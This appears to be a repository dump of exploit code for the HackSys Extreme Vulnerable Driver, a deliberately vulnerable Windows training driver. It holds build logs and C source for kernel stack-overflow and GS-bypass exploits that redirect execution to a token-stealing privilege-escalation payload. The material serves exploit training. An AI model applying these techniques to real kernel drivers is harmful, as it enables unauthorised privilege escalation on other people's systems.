10 | C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\HackSysEVDExploit.write.1.tlog
11 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\INTEGEROVERFLOW.OBJ
12 | C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\link.command.1.tlog
13 | C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\link.read.1.tlog
14 | C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\link.write.1.tlog
15 | C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\mt.command.1.tlog
16 | C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\mt.read.1.tlog
17 | C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\mt.write.1.tlog
18 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\NULLPOINTERDEREFERENCE.OBJ
19 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\PAYLOADS.OBJ
20 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\POOLOVERFLOW.OBJ
21 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\STACKOVERFLOW.OBJ
22 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\STACKOVERFLOWGS.OBJ
23 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\TYPECONFUSION.OBJ
24 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\UNINITIALIZEDHEAPVARIABLE.OBJ
25 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\UNINITIALIZEDSTACKVARIABLE.OBJ
26 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\USEAFTERFREE.OBJ
27 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\VC100.PDB
28 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.exe
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.lastbuildstate:
--------------------------------------------------------------------------------
1 | #v4.0:v100
2 | Release|Win32|C:\HackSysExtremeVulnerableDriver\Exploit\Source\|
3 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.log:
--------------------------------------------------------------------------------
1 | Build started 2/1/2017 4:33:09 AM.
2 | Project "C:\HackSysExtremeVulnerableDriver\Exploit\Source\HackSysEVDExploit.vcxproj" on node 2 (rebuild target(s)).
3 | _PrepareForClean:
4 | Deleting file "Release\HackSysEVDExploit.lastbuildstate".
5 | InitializeBuildStatus:
6 | Creating "Release\HackSysEVDExploit.unsuccessfulbuild" because "AlwaysCreate" was specified.
7 | ClCompile:
8 | C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\bin\CL.exe /c /Zi /nologo /W3 /WX- /O2 /Oi /Oy- /GL /D _MBCS /Gm- /EHsc /MD /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Fo"Release\\" /Fd"Release\vc100.pdb" /Gd /TC /analyze- /errorReport:prompt ArbitraryOverwrite.c Common.c HackSysEVDExploit.c IntegerOverflow.c NullPointerDereference.c PoolOverflow.c Payloads.c StackOverflow.c StackOverflowGS.c TypeConfusion.c UninitializedHeapVariable.c UninitializedStackVariable.c UseAfterFree.c
9 | ArbitraryOverwrite.c
10 | Common.c
11 | HackSysEVDExploit.c
12 | IntegerOverflow.c
13 | NullPointerDereference.c
14 | PoolOverflow.c
15 | Payloads.c
16 | StackOverflow.c
17 | StackOverflowGS.c
18 | TypeConfusion.c
19 | UninitializedHeapVariable.c
20 | UninitializedHeapVariable.c(73): warning C4101: 'i' : unreferenced local variable
21 | UninitializedStackVariable.c
22 | UseAfterFree.c
23 | Link:
24 | C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\bin\link.exe /ERRORREPORT:PROMPT /OUT:"C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\HackSysEVDExploit.exe" /NOLOGO kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /MANIFEST /ManifestFile:"Release\HackSysEVDExploit.exe.intermediate.manifest" /MANIFESTUAC:"level='asInvoker' uiAccess='false'" /DEBUG /PDB:"C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\HackSysEVDExploit.pdb" /OPT:REF /OPT:ICF /LTCG /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:"C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\HackSysEVDExploit.lib" /MACHINE:X86 Release\ArbitraryOverwrite.obj
25 | Release\Common.obj
26 | Release\HackSysEVDExploit.obj
27 | Release\IntegerOverflow.obj
28 | Release\NullPointerDereference.obj
29 | Release\PoolOverflow.obj
30 | Release\Payloads.obj
31 | Release\StackOverflow.obj
32 | Release\StackOverflowGS.obj
33 | Release\TypeConfusion.obj
34 | Release\UninitializedHeapVariable.obj
35 | Release\UninitializedStackVariable.obj
36 | Release\UseAfterFree.obj
37 | Generating code
38 | Finished generating code
39 | HackSysEVDExploit.vcxproj -> C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\HackSysEVDExploit.exe
40 | Manifest:
41 | C:\Program Files (x86)\Microsoft SDKs\Windows\v7.0A\bin\mt.exe /nologo /verbose /outputresource:"C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\HackSysEVDExploit.exe;#1" /manifest Release\HackSysEVDExploit.exe.intermediate.manifest
42 | FinalizeBuildStatus:
43 | Deleting file "Release\HackSysEVDExploit.unsuccessfulbuild".
44 | Touching "Release\HackSysEVDExploit.lastbuildstate".
45 | Done Building Project "C:\HackSysExtremeVulnerableDriver\Exploit\Source\HackSysEVDExploit.vcxproj" (rebuild target(s)).
46 |
47 | Build succeeded.
48 |
49 | Time Elapsed 00:00:02.76
50 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.pdb
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.vcxprojResolveAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.vcxprojResolveAssemblyReference.cache
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit1.exe
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/IntegerOverflow.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/IntegerOverflow.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/NullPointerDereference.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/NullPointerDereference.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/Payloads.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/Payloads.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/PoolOverflow.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/PoolOverflow.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/StackOverflow.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/StackOverflow.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/StackOverflowGS.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/StackOverflowGS.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/TypeConfusion.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/TypeConfusion.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/UninitializedHeapVariable.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/UninitializedHeapVariable.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/UninitializedStackVariable.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/UninitializedStackVariable.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/UseAfterFree.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/UseAfterFree.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/cl.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/cl.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/link.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/link.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/link.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/mt.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/mt.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/mt.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/mt.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/mt.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/mt.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/vc100.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/vc100.pdb
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/StackOverflow.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see <http://www.gnu.org/licenses/>.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | StackOverflow.c
43 |
44 | Abstract:
45 | This module implements the exploit for Stack Overflow
46 | Vulnerability implemented in HackSys Extreme Vulnerable
47 | Driver.
48 |
49 | --*/
50 |
51 | #include "StackOverflow.h"
52 |
/*
 * Worker thread for the "Stack Overflow" lab case.
 *
 * Builds a user-mode buffer of (BUFFER_SIZE + RET_OVERWRITE) ULONGs, fills it
 * with 0x41, stores the address of TokenStealingPayloadWin7 in the last ULONG
 * slot (the debug output labels this slot "RET"), and passes the whole buffer
 * to the driver with HACKSYS_EVD_IOCTL_STACK_OVERFLOW.  The body runs under
 * SEH; any exception terminates the process via exit().
 *
 * Parameter: unused (present only to satisfy the CreateThread signature).
 * Returns:   EXIT_SUCCESS.  Every failure path calls exit(EXIT_FAILURE)
 *            instead of returning, so the caller never sees a failure code.
 *
 * NOTE(review): hFile is never closed and UserModeBuffer is not freed on the
 * exception path.  Harmless only because every error path exits the process;
 * worth fixing if this thread is ever run more than once per process.
 * NOTE(review): DeviceIoControl's return value is ignored, so a driver that
 * rejects the oversized input (the correct fix on the driver side is to check
 * the input length against the destination buffer before copying) would be
 * indistinguishable from success in the log output.
 */
DWORD WINAPI StackOverflowThread(LPVOID Parameter) {
    HANDLE hFile = NULL;
    ULONG BytesReturned;
    PVOID MemoryAddress = NULL;
    PULONG UserModeBuffer = NULL;
    LPCSTR FileName = (LPCSTR)DEVICE_NAME;
    // Address of a user-mode function (defined elsewhere in the project).
    // The "Win7" suffix suggests the intended target; whether a kernel would
    // actually run user-mode code depends on the target's mitigations
    // (SMEP etc.) -- presumably absent on the lab system.
    PVOID EopPayload = &TokenStealingPayloadWin7;
    // RET_OVERWRITE extra slots beyond BUFFER_SIZE (RET_OVERWRITE is in
    // StackOverflow.h; BUFFER_SIZE is expected to come from Common.h).
    SIZE_T UserModeBufferSize = (BUFFER_SIZE + RET_OVERWRITE) * sizeof(ULONG);

    __try {
        DEBUG_MESSAGE("\t[+] Setting Thread Priority\n");

        // Priority change is best-effort: failure is logged but not fatal.
        if (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST)) {
            DEBUG_ERROR("\t\t[-] Failed To Set As THREAD_PRIORITY_HIGHEST\n");
        }
        else {
            DEBUG_INFO("\t\t[+] Priority Set To THREAD_PRIORITY_HIGHEST\n");
        }

        // Get the device handle
        DEBUG_MESSAGE("\t[+] Getting Device Driver Handle\n");
        DEBUG_INFO("\t\t[+] Device Name: %s\n", FileName);

        hFile = GetDeviceHandle(FileName);

        // GetDeviceHandle is a project helper; this code assumes it reports
        // failure as INVALID_HANDLE_VALUE (CreateFile convention), not NULL.
        if (hFile == INVALID_HANDLE_VALUE) {
            DEBUG_ERROR("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
        else {
            DEBUG_INFO("\t\t[+] Device Handle: 0x%X\n", hFile);
        }

        DEBUG_MESSAGE("\t[+] Setting Up Vulnerability Stage\n");

        DEBUG_INFO("\t\t[+] Allocating Memory For Buffer\n");

        UserModeBuffer = (PULONG)HeapAlloc(GetProcessHeap(),
                                           HEAP_ZERO_MEMORY,
                                           UserModeBufferSize);

        if (!UserModeBuffer) {
            DEBUG_ERROR("\t\t\t[-] Failed To Allocate Memory: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
        else {
            DEBUG_INFO("\t\t\t[+] Memory Allocated: 0x%p\n", UserModeBuffer);
            DEBUG_INFO("\t\t\t[+] Allocation Size: 0x%X\n", UserModeBufferSize);
        }

        DEBUG_INFO("\t\t[+] Preparing Buffer Memory Layout\n");

        // Filler pattern; the only meaningful content is the final ULONG below.
        RtlFillMemory((PVOID)UserModeBuffer, UserModeBufferSize, 0x41);

        // Last ULONG of the buffer.  The (ULONG) pointer cast is 32-bit only,
        // consistent with the project's /MACHINE:X86 build.
        MemoryAddress = (PVOID)(((ULONG)UserModeBuffer + UserModeBufferSize) - sizeof(ULONG));
        *(PULONG)MemoryAddress = (ULONG)EopPayload;

        DEBUG_INFO("\t\t\t[+] RET Value: 0x%p\n", *(PULONG)MemoryAddress);
        DEBUG_INFO("\t\t\t[+] RET Address: 0x%p\n", MemoryAddress);

        DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);

        DEBUG_MESSAGE("\t[+] Triggering Kernel Stack Overflow\n");

        OutputDebugString("****************Kernel Mode****************\n");

        // Observable event for detection: a DeviceIoControl to DEVICE_NAME
        // whose input length exceeds what the driver's stack buffer holds.
        DeviceIoControl(hFile,
                        HACKSYS_EVD_IOCTL_STACK_OVERFLOW,
                        (LPVOID)UserModeBuffer,
                        (DWORD)UserModeBufferSize,
                        NULL,
                        0,
                        &BytesReturned,
                        NULL);

        OutputDebugString("****************Kernel Mode****************\n");

        HeapFree(GetProcessHeap(), 0, (LPVOID)UserModeBuffer);

        UserModeBuffer = NULL;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        // GetLastError() is not the exception code; GetExceptionCode() would
        // be the accurate value to log here.
        DEBUG_ERROR("\t\t[-] Exception: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }

    return EXIT_SUCCESS;
}
141 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/StackOverflow.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see <http://www.gnu.org/licenses/>.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | StackOverflow.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | exploit for Stack Overflow Vulnerability implemented in
47 | HackSys Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #ifndef __STACK_OVERFLOW_H__
52 | #define __STACK_OVERFLOW_H__
53 |
54 | #pragma once
55 |
56 | #include "Common.h"
57 |
// Number of extra ULONG slots StackOverflow.c appends to BUFFER_SIZE when it
// sizes the IOCTL input buffer; the payload address is written into the last
// of those slots.
#define RET_OVERWRITE 9

// Thread entry point (CreateThread signature); Parameter is unused.
DWORD WINAPI StackOverflowThread(LPVOID Parameter);
61 |
62 | #endif //__STACK_OVERFLOW_H__
63 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/StackOverflowGS.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see <http://www.gnu.org/licenses/>.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | StackOverflowGS.c
43 |
44 | Abstract:
45 | This module implements the exploit for Stack Overflow
46 | Vulnerability protected by GS cookies implemented in
47 | HackSys Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #include "StackOverflowGS.h"
52 |
/*
 * Worker thread for the "Stack Overflow GS" lab case.
 *
 * Creates a one-page named file mapping, maps it, fills it with 0x41 and
 * places the input buffer SeHandlerOverwriteOffset (0x214) bytes before the
 * end of the page.  Four ULONGs at fixed offsets inside that buffer are then
 * set (the inline comments and debug strings label them as the XOR'ed cookie,
 * junk, next SE handler and SE handler), and the buffer is passed to the
 * driver with HACKSYS_EVD_IOCTL_STACK_OVERFLOW_GS using a length of
 * 0x214 + RAISE_EXCEPTION_IN_KERNEL_MODE.  Because the buffer ends exactly at
 * the page boundary, that extra length presumably runs off the mapping while
 * the kernel copies it -- the constant's name says this is intentional.
 *
 * Parameter: unused (present only to satisfy the CreateThread signature).
 * Returns:   EXIT_SUCCESS.  Every failure path calls exit(EXIT_FAILURE)
 *            instead of returning.
 *
 * NOTE(review): hFile and Sharedmemory are never closed and the view is never
 * unmapped; tolerable here only because the process exits on every error.
 * NOTE(review): the mapping is created with a fixed, well-known name
 * (SHARED_MEMORY_NAME) and NULL security attributes, so it gets the default
 * DACL; another process in the same session could open it by name.
 * NOTE(review): DeviceIoControl's return value is ignored (see the
 * StackOverflow case for the same issue).
 */
DWORD WINAPI StackOverflowGSThread(LPVOID Parameter) {
    HANDLE hFile = NULL;
    ULONG BytesReturned;
    // Size of the mapping; assumed to equal the system page size (0x1000).
    SIZE_T PageSize = 0x1000;
    HANDLE Sharedmemory = NULL;
    PVOID MemoryAddress = NULL;
    PVOID SuitableMemoryForBuffer = NULL;
    LPCSTR FileName = (LPCSTR)DEVICE_NAME;
    LPVOID SharedMappedMemoryAddress = NULL;
    // Distance from the buffer start to the end of the page; also the base
    // input length sent to the driver.
    SIZE_T SeHandlerOverwriteOffset = 0x214;
    // User-mode payload address (defined elsewhere in the project; note the
    // identifier is spelled "Paylad", so it must match that definition).
    PVOID EopPayload = &TokenStealingPayladGSWin7;
    LPCTSTR SharedMemoryName = (LPCSTR)SHARED_MEMORY_NAME;

    __try {
        DEBUG_MESSAGE("\t[+] Setting Thread Priority\n");

        // Best-effort; failure is logged but not fatal.
        if (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST)) {
            DEBUG_ERROR("\t\t[-] Failed To Set As THREAD_PRIORITY_HIGHEST\n");
        }
        else {
            DEBUG_INFO("\t\t[+] Priority Set To THREAD_PRIORITY_HIGHEST\n");
        }

